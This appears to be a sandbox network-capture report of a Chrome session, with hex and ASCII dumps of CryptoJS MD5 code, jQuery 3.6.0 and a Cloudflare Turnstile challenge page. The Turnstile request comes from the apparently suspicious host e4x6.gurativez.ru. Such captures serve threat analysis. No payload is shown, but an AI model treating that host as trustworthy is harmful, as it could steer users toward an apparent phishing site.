                                                                                              2024-12-19 13:35:58 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                                                                              Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
                                                                                              2024-12-19 13:35:58 UTC1369INData Raw: 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e
                                                                                              Data Ascii: sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this.
                                                                                              2024-12-19 13:35:58 UTC1369INData Raw: 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35
                                                                                              Data Ascii: m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[5


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.649745151.101.130.1374436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:58 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                              Host: code.jquery.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:58 UTC613INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              Content-Length: 89501
                                                                                              Server: nginx
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                              ETag: "28feccc0-15d9d"
                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Thu, 19 Dec 2024 13:35:58 GMT
                                                                                              Age: 3136890
                                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740058-EWR
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 2774, 2
                                                                                              X-Timer: S1734615359.720921,VS0,VE0
                                                                                              Vary: Accept-Encoding
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                              2024-12-19 13:35:58 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.649755104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:59 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/ HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: iframe
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:00 UTC1362INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 26678
                                                                                              Connection: close
                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                              cross-origin-embedder-policy: require-corp
                                                                                              cross-origin-opener-policy: same-origin
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              origin-agent-cluster: ?1
                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                              referrer-policy: same-origin
                                                                                              document-policy: js-profiling
                                                                                              2024-12-19 13:36:00 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 37 63 37 37 31 38 66 36 32 34 33 38 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8f47c7718f624386-EWRalt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:00 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
